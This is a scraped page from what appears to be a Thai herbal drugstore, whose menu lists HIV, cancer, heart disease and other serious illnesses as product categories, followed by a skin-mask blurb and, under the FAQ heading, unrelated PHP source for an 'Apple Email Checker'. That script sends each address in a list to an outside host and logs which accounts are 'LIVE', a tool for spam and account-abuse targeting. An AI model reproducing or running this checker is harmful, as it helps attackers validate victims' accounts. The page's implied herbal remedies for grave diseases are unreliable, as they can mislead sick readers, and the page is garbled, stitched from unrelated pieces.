ไทย l EN l 中文
 
Home About us Products How to buy News Contact us FAQ
 

Diabetes
Uterus Cancer
Hemiplegia
Heart Disease
Tumour
Initial HIV
Masculine Hepatitis
Migrain Headache
Calculus (gallbladder, urethra, kidney)
Galactophore Cancer
Infertility
Cancer, Serious Disease
Others...

 
   
 
Sylvia mask powder
Sylvia Facial Mask Powder. [natural 100%] [Function] (External)- Facial apply -Skin cleaning and whitening - Reduce wrinkles, blemishes - Facial delicate and, smoothen skin (Internal) - Oral Dose - Nourishin

Herb Health Hope...

Copyright 2010 @
TianZeeTang Drugstore co., Ltd
All Rights Reserved
FAQ  
 
HomeFAQ

<html><body><?php

error_reporting(0);

function getStr($string,$start,$end){

 $str = explode($start,$string);

 $str = explode($end,$str[1]);

 return $str[0];

}

function save($name,$data){

        $myfile = fopen($name, "a+") or die("Unable to open file!");

        fwrite($myfile, $data);

        fclose($myfile);

        if($myfile){

                return true;

        }else{

                return false;

        }

}

 

function check($email,$name){

$fgt = file_get_contents("http://firstideashop.com/js/epel/epel.php?email=".$email."");

//$valid = getStr($fgt, '"status":"','"');

//$used = getStr($fgt, '"used" : ',',');

$deco = getStr($fgt, '{"status":"','"}');

if($deco == "Dead") {

return false;

}

if($deco == "Live") {

$status = "Live";

 $data = "$email => LIVE ";

 if(!save($name,$data)){

  echo "ops... chmod dulu/buat file kosong dulu ";

  exit();

 }

 return true;

} else {

return false;

}

}

 

 

if(isset($argv[1]) && isset($argv[2])){

if(file_exists($argv[1])){

cover();

$no=1;

$valid=0;

$invalid=0;

 

$load = file_get_contents($argv[1]);

$mail_explode = explode(" ", $load);

$cont = count($mail_explode);

 

foreach ($mail_explode as $key => $email) {

 echo "[$no/$cont] $email -> ";

if(check($email,$argv[2])) {

  echo "LIVE ";

  $valid++;

 }else {

echo "DEAD ";

$invalid++;

}

$no++;

}

 

echo "[HASIL] Valid : $valid | Invalid : $invalid | Total : $cont ";

 

}

}else{

 echo "php ".$argv[0]." {list} {output} ";

}

 

function cover(){

$cover.="======================================== ";

$cover.="=         Apple Email Checker          = ";

$cover.="=       Only Check DIE or LIVE         = ";

$cover.="= Recoded From : Shor7cut PPValidMail  = ";

$cover.="======================================== ";

echo $cover;

}

 

?>

</body></html>